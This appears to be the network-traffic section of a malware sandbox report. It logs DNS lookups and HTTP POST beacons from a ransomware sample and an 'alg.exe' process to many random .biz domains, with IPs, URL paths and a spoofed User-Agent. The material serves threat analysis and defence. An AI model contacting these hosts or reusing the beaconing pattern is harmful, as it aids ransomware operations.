alg.exe

Remote address:

8.8.8.8:53

Request

nqwjmb.biz

IN A

Response

nqwjmb.biz

IN A

35.164.78.200
POST

http://nqwjmb.biz/yvkqxkipwavs

alg.exe

Remote address:

35.164.78.200:80

Request

POST /yvkqxkipwavs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0ba919a879db2c7e6734a3eedeac6d5f|194.110.13.70|1723257671|1723257671|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yunalwv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yunalwv.biz

IN A

Response

yunalwv.biz

IN A

208.100.26.245
DNS

ytctnunms.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ytctnunms.biz

IN A

Response

ytctnunms.biz

IN A

3.94.10.34
POST

http://ytctnunms.biz/qjbovdx

alg.exe

Remote address:

3.94.10.34:80

Request

POST /qjbovdx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=afc5ee89d9b5a5f976c3bc0e79726e7e|194.110.13.70|1723257671|1723257671|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jpskm.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jpskm.biz

IN A

Response

jpskm.biz

IN A

34.211.97.45
POST

http://jpskm.biz/vv

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /vv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8214a8c5077a515cbdf5e3eaca4b2bce|194.110.13.70|1723257672|1723257672|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

myups.biz

alg.exe

Remote address:

8.8.8.8:53

Request

myups.biz

IN A

Response

myups.biz

IN A

165.160.15.20

myups.biz

IN A

165.160.13.20
POST

http://myups.biz/e

alg.exe

Remote address:

165.160.15.20:80

Request

POST /e HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Date: Sat, 10 Aug 2024 02:41:12 GMT
Content-Length: 94
POST

http://myups.biz/phefhp

alg.exe

Remote address:

165.160.15.20:80

Request

POST /phefhp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Date: Sat, 10 Aug 2024 02:41:12 GMT
Content-Length: 94
DNS

lrxdmhrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lrxdmhrr.biz

IN A

Response

lrxdmhrr.biz

IN A

54.244.188.177
POST

http://lrxdmhrr.biz/f

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /f HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b19aa46a06f7bfe3bb74748f7dfabc16|194.110.13.70|1723257672|1723257672|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

45.97.211.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.97.211.34.in-addr.arpa

IN PTR

Response

45.97.211.34.in-addr.arpa

IN PTR

ec2-34-211-97-45 us-west-2compute amazonawscom
DNS

kvbjaur.biz

Remote address:

8.8.8.8:53

Request

kvbjaur.biz

IN A

Response

kvbjaur.biz

IN A

54.244.188.177
DNS

20.15.160.165.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.15.160.165.in-addr.arpa

IN PTR

Response
DNS

oshhkdluh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

oshhkdluh.biz

IN A

Response

oshhkdluh.biz

IN A

54.244.188.177
POST

http://oshhkdluh.biz/vaqrwjenfcgdoimi

alg.exe

Remote address:

54.244.188.177:80

Request

POST /vaqrwjenfcgdoimi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5a6a93a24ce8ae793c1a17c5f93f6cd7|194.110.13.70|1723257673|1723257673|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

wllvnzb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

wllvnzb.biz

IN A

Response

wllvnzb.biz

IN A

18.141.10.107
POST

http://wllvnzb.biz/ebnsnrfcmadivrr

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /ebnsnrfcmadivrr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0456a2f7322c9078a88d9122f206d24c|194.110.13.70|1723257673|1723257673|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yunalwv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yunalwv.biz

IN A

Response

yunalwv.biz

IN A

208.100.26.245
DNS

jpskm.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jpskm.biz

IN A

Response

jpskm.biz

IN A

34.211.97.45
POST

http://jpskm.biz/vhmxekcwgn

alg.exe

Remote address:

34.211.97.45:80

Request

POST /vhmxekcwgn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7e80eefad8dbeda07fe09da5d36d53d6|194.110.13.70|1723257674|1723257674|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gnqgo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gnqgo.biz

IN A

Response

gnqgo.biz

IN A

18.208.156.248
DNS

lrxdmhrr.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lrxdmhrr.biz

IN A

Response

lrxdmhrr.biz

IN A

54.244.188.177
POST

http://gnqgo.biz/xch

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.208.156.248:80

Request

POST /xch HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=40f1fa596982e6e83df9bf67efa1a039|194.110.13.70|1723257674|1723257674|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://lrxdmhrr.biz/tkfreqok

alg.exe

Remote address:

54.244.188.177:80

Request

POST /tkfreqok HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=97f36da0df01e1856322fe58295b529e|194.110.13.70|1723257674|1723257674|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jhvzpcfg.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jhvzpcfg.biz

IN A

Response

jhvzpcfg.biz

IN A

44.221.84.105
POST

http://jhvzpcfg.biz/eumhnkxgxvlha

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /eumhnkxgxvlha HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ad7ac0da2bec7b6b234aa47f9d20460c|194.110.13.70|1723257674|1723257674|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

acwjcqqv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

acwjcqqv.biz

IN A

Response

acwjcqqv.biz

IN A

18.141.10.107
DNS

wllvnzb.biz

alg.exe

Remote address:

8.8.8.8:53

Request

wllvnzb.biz

IN A

Response

wllvnzb.biz

IN A

18.141.10.107
POST

http://acwjcqqv.biz/lqww

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /lqww HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=26df4034d19804b507426bde2d02952d|194.110.13.70|1723257675|1723257675|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://wllvnzb.biz/vgtpmxrv

alg.exe

Remote address:

18.141.10.107:80

Request

POST /vgtpmxrv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4feb2c70f51929cfc35cc5f62a00273a|194.110.13.70|1723257675|1723257675|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

lejtdj.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lejtdj.biz

IN A

Response
DNS

gnqgo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

gnqgo.biz

IN A

Response

gnqgo.biz

IN A

18.208.156.248
DNS

vyome.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vyome.biz

IN A

Response

vyome.biz

IN A

44.213.104.86
POST

http://gnqgo.biz/chhvlxbnyeptx

alg.exe

Remote address:

18.208.156.248:80

Request

POST /chhvlxbnyeptx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=72040e76dc24da7dba7601839ee82989|194.110.13.70|1723257676|1723257676|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://vyome.biz/dfbius

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.213.104.86:80

Request

POST /dfbius HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ad67b4615f6efd4248e1e040341da8dc|194.110.13.70|1723257676|1723257676|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jhvzpcfg.biz

alg.exe

Remote address:

8.8.8.8:53

Request

jhvzpcfg.biz

IN A

Response

jhvzpcfg.biz

IN A

44.221.84.105
DNS

yauexmxk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yauexmxk.biz

IN A

Response

yauexmxk.biz

IN A

18.208.156.248
POST

http://jhvzpcfg.biz/osmicrm

alg.exe

Remote address:

44.221.84.105:80

Request

POST /osmicrm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d1c6c84efca4053bd7de97a79ed4fe0a|194.110.13.70|1723257676|1723257676|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://yauexmxk.biz/ixgtdmsnbehuinty

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.208.156.248:80

Request

POST /ixgtdmsnbehuinty HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=11fdfd73264a18203158589e97df874a|194.110.13.70|1723257676|1723257676|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

acwjcqqv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

acwjcqqv.biz

IN A

Response

acwjcqqv.biz

IN A

18.141.10.107
DNS

iuzpxe.biz

alg.exe

Remote address:

8.8.8.8:53

Request

iuzpxe.biz

IN A

Response

iuzpxe.biz

IN A

13.251.16.150
POST

http://acwjcqqv.biz/fbogd

alg.exe

Remote address:

18.141.10.107:80

Request

POST /fbogd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=108fec7abf33cd5a3ae38bff90e7f5e3|194.110.13.70|1723257677|1723257677|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://iuzpxe.biz/ajndjgmdxag

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /ajndjgmdxag HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=064c57c7930b29a2e638d99b7760a29f|194.110.13.70|1723257677|1723257677|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

5.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

5.173.189.20.in-addr.arpa

IN PTR

Response
DNS

5.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

5.173.189.20.in-addr.arpa

IN PTR
DNS

86.104.213.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.104.213.44.in-addr.arpa

IN PTR

Response

86.104.213.44.in-addr.arpa

IN PTR

ec2-44-213-104-86 compute-1 amazonawscom
DNS

lejtdj.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lejtdj.biz

IN A

Response
DNS

vyome.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vyome.biz

IN A

Response

vyome.biz

IN A

44.213.104.86
POST

http://vyome.biz/sbvyanland

alg.exe

Remote address:

44.213.104.86:80

Request

POST /sbvyanland HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0cff472a96d3b0157f73f10849bacbf2|194.110.13.70|1723257677|1723257677|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yauexmxk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yauexmxk.biz

IN A

Response

yauexmxk.biz

IN A

18.208.156.248
POST

http://yauexmxk.biz/ijyvhudj

alg.exe

Remote address:

18.208.156.248:80

Request

POST /ijyvhudj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e5046c3fd44bf4262fffa9e14272a97e|194.110.13.70|1723257678|1723257678|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

iuzpxe.biz

alg.exe

Remote address:

8.8.8.8:53

Request

iuzpxe.biz

IN A

Response

iuzpxe.biz

IN A

13.251.16.150
POST

http://iuzpxe.biz/huf

alg.exe

Remote address:

13.251.16.150:80

Request

POST /huf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4cea2f6e2f067113d1310e3a6a30160d|194.110.13.70|1723257679|1723257679|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301582_1MLHFWTHBIK9NA4JB&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239317301582_1MLHFWTHBIK9NA4JB&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 719294
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
